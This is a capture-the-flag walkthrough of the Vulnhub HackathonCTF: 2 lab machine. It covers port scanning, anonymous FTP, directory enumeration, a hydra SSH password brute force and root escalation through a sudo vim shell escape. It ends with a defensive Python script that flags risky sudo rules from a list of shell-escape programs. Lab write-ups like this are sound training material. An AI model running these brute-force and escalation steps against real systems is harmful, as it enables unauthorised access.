Vulnhub HackathonCTF: 2 Walkthrough
https://www.vulnhub.com/entry/hackathonctf-2,714/
Difficulty: Easy
Scan all TCP ports.
```
~ nmap -sV -sC -p- 192.168.33.140 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
Nmap scan report for bogon (192.168.33.140)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1000 1000 47 Jun 18 17:32 flag1.txt
|_-rw-r--r-- 1 1000 1000 849 Jun 19 05:11 word.dir
...
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry ...
7223/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
...
```
Download the wordlist file word.dir from the anonymous FTP share.
```
~ ftp 192.168.33.140
Connected to 192.168.33.140.
220 (vsFTPd 3.0.3)
Name (192.168.33.140:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 118 4096 Jun 19 05:11 .
drwxr-xr-x 2 0 118 4096 Jun 19 05:11 ..
-rw-r--r-- 1 1000 1000 47 Jun 18 17:32 flag1.txt
-rw-r--r-- 1 1000 1000 849 Jun 19 05:11 word.dir
226 Directory send OK.
ftp> get word.dir
local: word.dir remote: word.dir
```
Enumerate directories and files on port 80.
```
~ gobuster dir -u http://192.168.33.140 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/index.html (Status: 200) [Size: 1254]
/robots.txt (Status: 200) [Size: 70]
/happy (Status: 200) [Size: 110]
```
Visit /happy and check the page source; an HTML comment discloses the username hackathonll.
```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>
<body><h1> Nothing is in here</h1></body>
<!-- username: hackathonll >
</html>
```
Brute-force SSH with this username and the word.dir wordlist.
```
~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
```
Log in over SSH and check sudo -l.
```
~ ssh hackathonll@192.168.33.140 -p 7223
...
$ sudo -l
Matching Defaults entries for hackathonll on hackathon:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hackathonll may run the following commands on hackathon:
(root) NOPASSWD: /usr/bin/vim
```
Run vim with sudo, press ":", then enter "!/bin/bash" to become root.
```
$ sudo vim
root@hackathon:/home/hackathonll# id
uid=0(root) gid=0(root) groups=0(root)
```
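The sudo rule shown above, an editor allowed as root, is the misconfiguration that ends this box. As an added example (not part of the original walkthrough), the following Python script parses `sudo -l` output and flags root rules for programs that can hand the user a shell. The binary list, the function names and the second rule in the sample are assumptions constructed for illustration.

```python
import re

# Assumption: short, non-exhaustive set of programs that can spawn a shell
# or run arbitrary commands from inside (editors, pagers, interpreters).
SHELL_ESCAPE_BINARIES = {"vim", "vi", "nano", "less", "more", "man", "find",
                         "awk", "env", "perl", "python3", "bash", "sh"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")

# Constructed sample: first rule is the walkthrough's; the second is invented.
SAMPLE = """User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
    (root) PASSWD: /usr/sbin/ufw status, NOEXEC: /usr/bin/less /var/log/syslog
"""


def parse_sudo_l(text):
    """Yield (runas_user, tags, command) for each rule in `sudo -l` output."""
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = set()
        for item in re.split(r"(?<!\\),\s*", m.group("rest")):
            while (t := TAG_RE.match(item)):  # tags carry over to later commands
                tag = t.group(1)
                tags.discard(tag[2:] if tag.startswith("NO") else "NO" + tag)
                tags.add(tag)
                item = item[t.end():]
            if item.strip():
                yield m.group("runas").split(":")[0].strip(), frozenset(tags), item.strip()


def risky_rules(text):
    """Return root rules whose program can hand the user a shell."""
    findings = []
    for user, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if user in ("root", "ALL") and (cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES):
            findings.append({"command": cmd, "nopasswd": "NOPASSWD" in tags,
                             "noexec": "NOEXEC" in tags})
    return findings


if __name__ == "__main__":
    print(*risky_rules(SAMPLE), sep="\n")
```

Where a user only needs to edit root-owned files, a `sudoedit` rule avoids running the editor itself as root.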